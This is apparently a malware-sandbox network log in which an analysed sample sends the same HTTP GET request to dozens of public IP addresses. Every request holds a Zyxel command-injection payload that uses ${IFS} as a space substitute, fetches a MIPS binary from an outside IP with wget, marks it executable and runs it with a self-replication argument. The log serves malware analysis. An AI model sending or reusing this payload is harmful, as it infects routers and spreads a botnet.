                                        Jan 14, 2024 16:18:41.372299910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3298192.168.2.135678269.244.169.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372345924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3299192.168.2.1342010110.78.254.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372394085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3300192.168.2.1347504196.154.164.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372428894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3301192.168.2.135422673.120.101.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372476101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3302192.168.2.1351302176.131.34.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372528076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3303192.168.2.1333134136.200.204.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372577906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3304192.168.2.1351886209.182.191.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372602940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3305192.168.2.1334996192.65.202.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372646093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3306192.168.2.136072840.57.98.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372670889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3307192.168.2.135635479.217.100.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372704983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3308192.168.2.1355924161.121.78.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372764111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3309192.168.2.135555827.46.76.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372819901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3310192.168.2.135852296.29.157.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372864962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3311192.168.2.135253061.254.49.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372912884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3312192.168.2.134305466.23.202.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372939110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3313192.168.2.134835073.42.107.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372967958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3314192.168.2.133772079.200.63.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.372999907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3315192.168.2.133539069.50.144.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373049021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3316192.168.2.134996879.48.169.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373083115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3317192.168.2.1353694192.78.135.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373128891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3318192.168.2.1347970177.174.190.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373161077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3319192.168.2.1350908132.181.50.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373203039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3320192.168.2.135198034.181.71.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373239994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3321192.168.2.1359578160.246.93.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373286963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3322192.168.2.1343348185.173.57.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373313904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3323192.168.2.1359338147.94.137.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373348951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3324192.168.2.1336696162.167.36.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373389006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3325192.168.2.1359530190.136.11.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373429060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3326192.168.2.1353520101.85.178.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373466969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3327192.168.2.133357243.48.9.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373491049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3328192.168.2.133819423.238.149.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373545885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3329192.168.2.1337482212.246.54.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373569965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3330192.168.2.135774447.32.95.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373610973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3331192.168.2.1352696180.32.182.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373666048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3332192.168.2.1339896197.88.17.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373697996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3333192.168.2.135658637.242.221.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373744965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3334192.168.2.1358878165.22.96.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373790026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3335192.168.2.1341730202.36.130.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373831987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3336192.168.2.1336270218.96.241.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373871088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3337192.168.2.13425789.176.222.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373909950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3338192.168.2.1357334121.219.40.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373941898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3339192.168.2.135029689.108.183.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.373970985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3340192.168.2.1342862138.114.197.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374038935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3341192.168.2.1348866203.242.106.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374063969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3342192.168.2.1344412170.151.216.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374114037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3343192.168.2.13404461.249.198.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374150038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3344192.168.2.135336095.193.254.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374196053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3345192.168.2.135638683.18.21.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374226093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3346192.168.2.1346490103.181.220.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374260902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3347192.168.2.1348330175.142.198.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374313116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3348192.168.2.1345376131.144.245.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374368906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3349192.168.2.134956613.31.96.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374425888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3350192.168.2.1354252118.3.66.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374465942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3351192.168.2.1360556131.17.220.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374497890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3352192.168.2.1332934222.183.45.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374528885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3353192.168.2.1333618218.110.207.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374571085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3354192.168.2.1346424126.30.11.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374615908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3355192.168.2.134076639.198.42.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374664068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3356192.168.2.135959876.155.66.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374692917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3357192.168.2.133676680.117.84.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374739885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3358192.168.2.1335712126.18.205.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374771118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3359192.168.2.1341570189.89.155.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374819040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3360192.168.2.1348096202.58.16.32443
                                        TimestampBytes transferredDirectionData
